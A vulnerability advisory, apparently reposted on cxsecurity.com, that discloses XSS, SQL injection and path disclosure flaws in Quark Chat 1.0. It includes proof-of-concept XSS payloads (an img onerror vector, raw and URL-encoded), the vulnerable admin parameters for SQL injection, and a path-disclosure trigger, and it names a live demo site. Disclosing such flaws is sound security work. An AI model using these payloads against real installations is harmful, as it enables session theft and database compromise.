Quark Chat 1.0 XSS / SQL Injection / Path Diclosure

2013.08.16
Credit: Dylan Irzi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

########################################################################################### # Exploit Title: Quark Chat 1.0 - XSS / SQL Injection / Path Diclosure # Date: 15 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://www.quack-chat.com/ # Tested on: Win8 & Linux Mint # Affected Version : 1.0 # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} # Greetz: All team WebSecuritydev. ########################################################################################### Cross Site Scripting: Archivos Afectados Afectados qchat.php qc_admin/index.php?p=history PoC: localhost/qchat.php Vector: ""><img src=x onerror=prompt(/XSS/);>> Input: <input id="name" type="text" style="width:200px;" name="name"> Is Reflected: localhost/qc_admin/index.php?p=history PoC #2: localhost/qc_admin/index.php?p=history&page=2+(XSS Vector) Example: localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E ------------------------------------------------------------------- SQL Injection localhost/qc_admin/index.php?p=history&id=(SQL Injection) localhost/qc_admin/index.php?p=history&page=(SQL Injection) Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e (Remplazar por una Session Cookie Valida) ------------------------------------------------------------------- Path Diclosure localhost/qc_admin/index.php?p=history&id=' in /var/www/chat/qc_admin/index.php on line 249 ------------------------------------------------------------------- Example: http://www.quack-chat.com/demo.php -------------------------------------------------------------------- *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad. *

References:

https://twitter.com/Dylan_irzi11


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top